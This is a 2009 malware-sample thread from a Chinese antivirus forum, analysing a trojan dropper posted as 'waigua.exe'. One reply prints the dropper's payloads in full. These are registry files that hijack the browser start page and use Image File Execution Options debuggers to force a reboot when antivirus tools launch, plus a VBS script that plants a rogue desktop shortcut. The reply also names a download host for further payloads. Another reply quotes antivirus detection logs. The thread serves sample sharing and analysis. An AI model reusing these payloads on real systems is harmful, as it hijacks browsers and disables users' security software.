查看: 1833|回复: 4
收起左侧

[病毒样本] 小玩意!

[复制链接]
amour123
发表于 2009-12-30 22:00:16 | 显示全部楼层 |阅读模式
大家在沙盘下运行一下!看看是不是病毒!

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
jck1996
发表于 2009-12-30 22:08:11 | 显示全部楼层
红伞拦截
BING126
头像被屏蔽
发表于 2009-12-30 22:08:34 | 显示全部楼层
是病毒。。McAfee 报了1个。。
username
发表于 2009-12-30 22:16:05 | 显示全部楼层
本帖最后由 username 于 2009-12-30 22:17 编辑

is a virus

waigua.exe
-load wshom.ocx (deny)
-C:\windows\temp\123.exe // software "regini" , open with the 123.ini
-C:\windows\temp\123.ini // [8] mean set only read access
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main [8]
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SuperKiller.exe [8]
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ArSwp.exe [8]
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\arswp3.exe [8]
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KSMGUI.exe [8]
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows [8]
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360se.exe [8]

-C:\windows\temp\ie.reg
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Classes\http\shell\Maxthon\command]
@="\"C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE\" \"%1\""
[HKEY_CLASSES_ROOT\http\shell\Maxthon\command]
@="\"C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE\" \"%1\""
[HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command]
@="\"C:\\Program Files\\Internet Explorer\\iexplore.exe\" http://www.qian14.cn"
[HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows]
"load"="c:\\windows\\fonts\\internat.vbs"
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://www.qian14.cn/"
[HKEY_CLASSES_ROOT\http\shell\TencentTraveler\command]
@="\"C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE\" \"%1\""
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SuperKiller.exe]
"Debugger"="shutdown -r -t 20"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ArSwp.exe]
"Debugger"="shutdown -r -t 20"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\arswp3.exe]
"Debugger"="shutdown -r -t 20"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ksmgui.exe]
"Debugger"="shutdown -r -t 20"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360se.exe]
"Debugger"="shutdown -r -t 20"

-C:\windows\fonts\internat.reg
Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command]
@="\"C:\\Program Files\\Internet Explorer\\iexplore.exe\" http://www.qian14.cn"
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://www.qian14.cn/"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel]
"{871C5380-42A0-1069-A2EA-08002B30309D}"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\ClassicStartMenu]
"{871C5380-42A0-1069-A2EA-08002B30309D}"=dword:00000000
[HKEY_CLASSES_ROOT\http\shell\TencentTraveler\command]
@="\"C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE\" \"%1\""
[HKEY_CURRENT_USER\Software\Classes\http\shell\Maxthon\command]
@="\"C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE\" \"%1\""
[HKEY_CLASSES_ROOT\http\shell\Maxthon\command]
@="\"C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE\" \"%1\""
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SuperKiller.exe]
"Debugger"="shutdown -r -t 20"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ArSwp.exe]
"Debugger"="shutdown -r -t 20"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\arswp3.exe]
"Debugger"="shutdown -r -t 20"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ksmgui.exe]
"Debugger"="shutdown -r -t 20"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360se.exe]
"Debugger"="shutdown -r -t 20"

-C:\windows\fonts\internat.vbs
On Error Resume Next
Dim fso,file
name1="Internet Explorer.lnk"
Set WshShell = WScript.CreateObject("WScript.Shell")
strDesktop = WshShell.SpecialFolders("Desktop") :
WshShell.run "regedit /s c:\windows\fonts\internat.reg"
Set fso=CreateObject("Scripting.FileSystemObject")
Set fld=fso.GetFolder(strDesktop)
set oShellLink = WshShell.CreateShortcut(strDesktop & "\QQ爱表情包.lnk")
oShellLink.TargetPath = "http://q.5pps.cn" :
oShellLink.WindowStyle = 3 :
oShellLink.Hotkey = "Ctrl+Alt+C" :
oShellLink.IconLocation = "c:\windows\fonts\tb.ico" :
oShellLink.Description = "QQ爱表情包" :
oShellLink.WorkingDirectory = strDesktop :
oShellLink.Save :
For Each file In fld.Files
name=fso.GetFileName(file)
If name=name1 Then  
file.Delete
End If
Next  

-C:\windows\fonts\tb.ico // only a icon file
-C:\windows\system32\internst.exe //empty file
-C:\windows\temp\svchost.exe //down form 98.126.191.122:8001
 -C:\windows\temp\updata.exe //down form 98.126.191.122:8001
  -C:\WINDOWS\system32\wybho.dll
  -C:\Program Files\Internet Explorer\updata.exe
  -delselfbat

all files pack

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
尤金卡巴斯基
发表于 2009-12-30 22:21:46 | 显示全部楼层
2009/12/30 22:19:54        已删除        木马程序 Trojan-Dropper.Win32.StartPage.cl        G:\Temp\Virus\waigua.zip/waigua.exe       
2009/12/30 22:20:21        已删除        木马程序 Trojan-Downloader.Win32.Adload.inv        G:\Temp\Virus\waigua.rar/svchost.exe       
2009/12/30 22:20:21        已删除        木马程序 Trojan.Win32.BHO.aczv        G:\Temp\Virus\waigua.rar/updata.exe//PE_Patch.UPX//UPX//data0000//PE_Patch.UPX//UPX       
2009/12/30 22:20:21        已删除        木马程序 Trojan.Win32.BHO.aczv        G:\Temp\Virus\waigua.rar/updata.exe//PE_Patch.UPX//UPX//data0000//PE_Patch.UPX       
2009/12/30 22:20:21        已删除        木马程序 Trojan.Win32.BHO.aczv        G:\Temp\Virus\waigua.rar/updata.exe//PE_Patch.UPX//UPX//data0000       
2009/12/30 22:20:21        已删除        木马程序 Trojan.Win32.BHO.aczv        G:\Temp\Virus\waigua.rar/updata.exe//PE_Patch.UPX//UPX       
2009/12/30 22:20:21        已删除        木马程序 Trojan.Win32.BHO.aczv        G:\Temp\Virus\waigua.rar/updata.exe//PE_Patch.UPX       
2009/12/30 22:20:21        已删除        木马程序 Trojan-Dropper.Win32.StartPage.cl        G:\Temp\Virus\waigua.rar/waigua.exe
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2026-4-20 06:12 , Processed in 0.077351 second(s), 3 queries , Redis On.

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表